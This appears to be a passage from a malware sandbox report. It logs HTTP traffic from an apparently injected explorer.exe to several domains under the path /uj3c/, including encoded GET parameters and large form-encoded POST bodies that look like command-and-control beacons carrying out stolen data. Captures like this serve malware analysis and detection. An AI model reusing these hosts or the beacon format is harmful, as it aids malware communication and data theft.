                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49851 | 154.55.180.56 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:14:45.330689907 CEST | 10086 | OUT | GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1
Host: www.empireapothecary.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49853 | 156.226.60.131 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:14:51.087372065 CEST | 10095 | OUT | GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
Host: www.moneytaoism.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 8, 2022 20:14:51.777698040 CEST | 10095 | OUT | GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
Host: www.moneytaoism.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49855 | 5.183.8.187 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:15:12.410327911 CEST | 10103 | OUT | GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1
Host: www.trendiddas.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 8, 2022 20:15:12.639900923 CEST | 10103 | IN | HTTP/1.1 404 Not Found
Date: Mon, 08 Aug 2022 18:15:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 280
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49856 | 188.114.97.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:15:34.555059910 CEST | 10105 | OUT | POST /uj3c/ HTTP/1.1
Host: www.trisuaka.xyz
Connection: close
Content-Length: 411
Cache-Control: no-cache
Origin: http://www.trisuaka.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.trisuaka.xyz/uj3c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49857 | 188.114.97.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:15:34.577404976 CEST | 10118 | OUT | POST /uj3c/ HTTP/1.1
Host: www.trisuaka.xyz
Connection: close
Content-Length: 36479
Cache-Control: no-cache
Origin: http://www.trisuaka.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.trisuaka.xyz/uj3c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                                                                Aug 8, 2022 20:15:34.612741947 CEST    10144    IN    HTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                Location: https://www.trisuaka.xyz/uj3c/
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WbuXodLAioqthRl4ygjUnLRL7D3kei2Prn53sKFcoWFCEV0WvXKnC96SlQLKyOqFz75anLMWiBcXP5yq8HFEVbCIjVRSJu%2FS4SzuFeeQMMIkmTbdTDJdctm3LB14lcZtPGoJ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Vary: Accept-Encoding
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 737a3cf92bbc9040-FRA
                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 16    Source IP: 192.168.2.3    Source Port: 49858    Destination IP: 188.114.97.3    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:15:34.595506907 CEST    10142    OUT    GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1
                                                                                                Host: www.trisuaka.xyz
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:15:34.628506899 CEST    10145    IN    HTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                Location: https://www.trisuaka.xyz/uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=92KWEFhBSRwmsypwogEsRGtYR2gRw749njRIjBDsGdPBDWDeaD3V0816lyOTlBBw4FmjMChsK%2FkYtyhrKrYAfbCkmnCjrFUtbGGI7oRkq51FXTIGb8jjg%2BT8V%2BLxgX%2B6x%2BId"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 737a3cf93dff9b9a-FRA
                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 17    Source IP: 192.168.2.3    Source Port: 49859    Destination IP: 38.54.163.57    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:15:40.151515961 CEST    10146    OUT    POST /uj3c/ HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Content-Length: 411
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.nomaxdic.com
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.nomaxdic.com/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).


                                                                                                Session ID: 18    Source IP: 192.168.2.3    Source Port: 49860    Destination IP: 38.54.163.57    Destination Port: 80    Process: C:\Windows\explorer.exe
                                                                                                Timestamp    kBytes transferred    Direction    Data
                                                                                                Aug 8, 2022 20:15:40.343843937 CEST    10155    OUT    POST /uj3c/ HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Content-Length: 36479
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.nomaxdic.com
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.nomaxdic.com/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 
61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51 66 35 45 47 74 62 6b 71 48 4f 63 6b 51 4b 44 65 77 5a 67 44 78 73 4d 5f 44 71 72 41 49 2d 4a 4f 65 6f 49 63 6e 37 57 46 61 49 67 76 42 59 51 46 68 55 34 41 68 48 7e 44 65 68 7e 58 49 51 6b 43 68 5f 34 59 74 36 4e 39 59 4d 78 68 61 34 36 63 6d 46 36 6e 65 76 79 51 4a 69 37 4e 73 2d 61 74 4c 52 54 7a 42 5f 42 44 57 38 73 62 6f 71 52 59 4f 4e 75 64 4e 62 4c 70 73 47 34 41 49 4b 35 68 4f 58 57 45 51 77 65 66 4e 65 58 5f 59 70 47 66 6e 6a 70 6a 35 73 58 55 5a 2d 46 79 51 6e 37 42 68 4f 57 44 6d 53 36 4d 75 58 68 52 58 6c 58 52 62 53 66 4c 65 41 41 4a 44 6e 49 48 52 78 69 5f 78 33 45 79 58 55 67 2d 58 6e 68 6d 4a 32 43 69 6d 43 6f 57 35 51 56 4d 44 4d 57 65 4c 70 57 6c 58 34 74 56 54 4d 59 38 66 68 65 35 53 6f 28 42 47 58 69 55 38 31 71 64 5a 54 6e 43 77 48 65 64 6f 2d 30 6f 78 58 41 2d 4a 7a 6d 73 51 47 59 4e 56 78 48 58 51 75 6d 42 78 58 55 74 66 56 45 44 30 7a 33 31 6c 75 74 59 62 4e 66 78 75 6b 77 67 38 73 42 41 7e 4a 64 32 33 51 67 59 67 47 76 53 64 39 36 6f 52 57 6f 69 67 55 42 77 47 52 79 30 30 71 36 2d 52 33 64 6e 43 38 41 6c 4a 48 6c 54 5a 64 75 6d 67 70 55 77 5a 6e 5a 6d 61 4c 68 36 44 66 4b 55 57 6a 54 64 71 43 58 59 48 6b 7e 76 4a 4f 56 74 74 4d 66 50 44 6d 4f 6e 6c 58 61 46 4d 51 58 78 51 54 78 63 6e 37 54 36 32 4d 51 35 61 61 77 34 65 77 6e 52 6b 39 6c 72 63 73 6c 
57 51 65 79 39 37 33 4d 79 6b 78 28 6c 76 64 73 68 74 47 76 70 49 38 63 41 4d 35 56 74 76 71 76 64 47 61 4a 68 6a 79 32 43 31 52 45 52 6e 51 45 77 66 77 4a 51 73 39 68 58 28 6e 56 59 50 58 43 6f 70
                                                                                                Data Ascii: r4S0P=vFqnDMjuN6~zqkFvp0QViTkfvoxLDWAJxBNiLL(fUlHhPePosuhwwm0eOdTOa-M_kZxAwgTIger-w0RQwDhboKQSwMsmRwPWaRfjGXuCzYvCDmZYh-vbtgwZRDk2V-j-3speqFpoD9bHxwezgE2E7yvzTxXBtmj3DlXl4ilMF5iEtzDiaQeELpgkBPz-3qe6ezrzLQ(QzNVSvSt_~aD32SbE3Yul3pCpvntQfMXPXcnJiKsBQzKECFq_4Ld9uMmry2Zci44TpjnmFF7YBX8QD-3T9Ao6i31D(girxj9CMgDQhjcl38ZtIyNskzji56HvN_UaiDZ1MtetAYI-4t(hO0SxICQlsZtiUXFQcxCmQlVRi-g6hQgjEAHDtJ4sL06uzVINw1~2b8d3ZZugDNrjj36kY79xaA9_ii(zX0gqRBWW(hUh1H9UUsAZHqrRaco2zFRJp7QyJCXUScZE5JhfbexgFRZ2Czxss9q_hqvPrc1wDCSU7mGHWyxkxBzsVcRe6qeoTb~dp9cHXAH2(I~M1FzHitHXIo6oQeT8kGyebkNcctpVlLeEotSx9Uhl302wu0l4n7cmYgBQr6sMzw7Jkg2YBCzzghZPGjuUmBj5Rm0Br3QMUanKqTvYvUdIsMEtVCe-kBXTeDKdDftbxcdfh6EhTmnQ4eqIckxM80QbwEOf8g4sSPOR9bQDx3a8szT0ispO1J0eZpCVX76INRi4F0wvgk60oHQZEbkPWXqm2bPPT2IAlSwaghv9OHmSykYzQiOtJgojs_mmWlLqlayS~GdvqRYxuOVyGuGRyi5lhowdhbe6AeWnVsfcwP5FnaMO0m(_l_RTcgnyM1GMUzwv8RP51LqQf5EGtbkqHOckQKDewZgDxsM_DqrAI-JOeoIcn7WFaIgvBYQFhU4AhH~Deh~XIQkCh_4Yt6N9YMxha46cmF6nevyQJi7Ns-atLRTzB_BDW8sboqRYONudNbLpsG4AIK5hOXWEQwefNeX_YpGfnjpj5sXUZ-FyQn7BhOWDmS6MuXhRXlXRbSfLeAAJDnIHRxi_x3EyXUg-XnhmJ2CimCoW5QVMDMWeLpWlX4tVTMY8fhe5So(BGXiU81qdZTnCwHedo-0oxXA-JzmsQGYNVxHXQumBxXUtfVED0z31lutYbNfxukwg8sBA~Jd23QgYgGvSd96oRWoigUBwGRy00q6-R3dnC8AlJHlTZdumgpUwZnZmaLh6DfKUWjTdqCXYHk~vJOVttMfPDmOnlXaFMQXxQTxcn7T62MQ5aaw4ewnRk9lrcslWQey973Mykx(lvdshtGvpI8cAM5VtvqvdGaJhjy2C1RERnQEwfwJQs9hX(nVYPXCop3LQKd1cTRfXQuynLtPySyK42nZuPDqo3foQZ9W6EyQtORDonzVbj7aJaShK9Syq0yloJRdWA3slB6xIFxoDuJbnH9VUCjx9jTWrfHkRzKV_PIWCxGRh3imxQS4Y2Rjz6sc22VCgki9JVSEF~bq1Aypxvlw0h7(lHqrvW5eMjHbc(SfDy9JSm1japP35L4Tqv01S9e5w9_XcFwBPsY3JMcKB2VsvdNZVY33Tgx(vi2wuKcSqNVi0fi(Q3UGhymrWEsA2nhJGSCZDzYgcjraEzhw09pWUPYMnVNGNmb68TsL1BFmyjPXSjFLN(Pd9Z8blZmYezKn9BG~RUEDaAiiU5Hv5qI(VhVZZYl(rhwttSE8b(Wx6vpeoVqwcdgDKJ7fYLPYKW3HZsM1QF0mIHS867GwJiQZAXcAndm6JGYWNBjh8X9ZvgIM6RROwuy0anRm2mRyIQYvit2pFnwUHgkpSCqsXenvOI9EXEtpaUt5oGvvHuIi0qgTj8Xl1C4(A9Klovv3sGYwDu_Vt1ho_Ww
3B(MKYCgDYlF(Ilio1ZhoGHjzKHHjr7aQ_b8AvJnhPhbur2bWUPiy9IYXtxYpnEnQtFVUjK1jzOoO5SlGeMrs5P81ZPjd0kT0C5_YRe7kvkGFKw6V2U2GUAqdGzFh8yq1qLiAT5fDOXjwZAQb4XHMwuRoOp4UxDZe8M8A37StE1g9ZfAD4ZwtO4IpYIAz15J4P8YDp07R2edlmPZe2SB0h90rmZvbzJt8Wj7po(Ktng9VBBhaLfq4itHyDW3jyokuKRpbpoM7OY9PaYeBbUkvg60L35zltInehf0cBSFrSgfU1yCqo8DGel9pWeekZfbx7wQ71h5rjrouF7yy0qrlTuvOKBd03acoMOyUG9lSA5MWA~rz5C9v02mHlUKVDWvhbJXK-vPi3b9qUMohBkx(ROjazoGnCyvNSzJvGeZU1AwxgWfuRnrfgtJYCYO(JWOTcoOOiJEs0BomKFX3v4CC9dRw1nrk_FR4T~z(PxknSArkqDY3qUWYhxLgiabKCkcFU7xYDZWaadxgky2zdS9KsJFRF1uXxdH4mIKkAHrZ8O_KWS2cT0zQe9iljn_8ZhjhH~zZkBmKQp0lnh_pds_jYKFvEuH5D49wupyqe6uNgfap8y32ZC1ach57n2nEcZ9USq5142wjNl-eXYk8VFw24ysGcvkYTF06C3CT2pJ9SEWLDazMZrwbsc85WQzXu0jyaSOW6j09yQes69l6JVr1JCGgz634rRaN12SFvlb48BLYT7hxtd4axf0(Et34FdmCxuI~btlU9FT~mtuPkIQlAHjQUtcFDVdKWJD1YXScU7LhCcOkGPeHb3gG8P08w5zvx9Zrw0xBnla8uspz8UdQgDSoGHk~pvWc0dsFMzfzcxYvygAVISzzEYFEX5oHyFsU85PekVtu6J0nuqM8PFeXsnVPXd4IThhVAm7V9X2o4CE02zgNKErEz8RldnVvHSzoj~h7VOX58mZxg8uSDtX1WDcqyaol7zoQDOwgLcPhbnHWgN7lOvoNm9a5AiR6ZQuO4BQFli0Xj3Aj3LSIrf0IVgzy2HriIjKhFUmFUUmp48cICjhkHDRCBAhc3As6WCDt0~klIuN9HGu9YIbZqmnURHaViR-gNSPzfhUnTbzO7Xgn_IwpMtGiNuQlqFnwq7BfNiefmVYEpn8nCs14vU4TKXgqcyn3WDxkl4vJDBcpiWZ0YC16-KD52yQGBmwPygrxytAI0VKfpZs8E(9o63map6lD83XttLN6zJhEynC~S8YD5bWVoHYr4i0iQLvf95weLAgMqS4xOY6LHwJ1ESy5npmDvXNAFw_3N15zkXOk1IZDCXPjkjElxrt~ohYyY(c1iwFcIF8MR0EQFzzo0TdcBqJmqU7VvTF2Clght6CpRwJ5UDkUb~eNOgblcZEeS9swRVHlqHONfbuAq(vy7At39Ct(xmOILgcKMAEjRs5~udTbHUuV3C7mjquiCbB~2bxiaweqSKODLGNlyuDip0K(Y3mMLaQaRVTcrQar-ht6nfBCb1DFFOKcjmlGFukNXMJD7Q2o_wvIASPImsAOakO5sPFmD4RAdayeX2XoYQ3Xw4rmqpZj3cBPqzqWgsWQyYew6~Fy7QbI3luybtFdrIImFRWTWoiKIilu8nMDZ1X(eMlCMUQYjKQuu(zrtKWw81nX6q55u~pbm(clDUdZ4J1ahNjhGZfo6Q80J42eMrLIhM_6zK3U81xzThInbYwSSE1ZZWR5wEYPcfU2icBOrrtMWUYP7XmJ6elrtSddR5CLJauLogjpW2lG6UA8I~A1rgeVTk6nl3KDHgPFaz3mfm_fqK4xNxA~83caeE-J6IQCBRgJ3XhJjVo0DTa(kS9Ry08GMQDoSU3wPzV5uzJhR4yXhkFmUpP~8hgz6(cC3GTa1~PpAPf9CY5oZWDQcEbYHQzkjaFbzyOgYgoQb434ktcNbi1uLRuhNqIl1h_OqeXs6vt~d3dVWOVLv(CZgor60CUd2Jcz9h6mjbmdcET
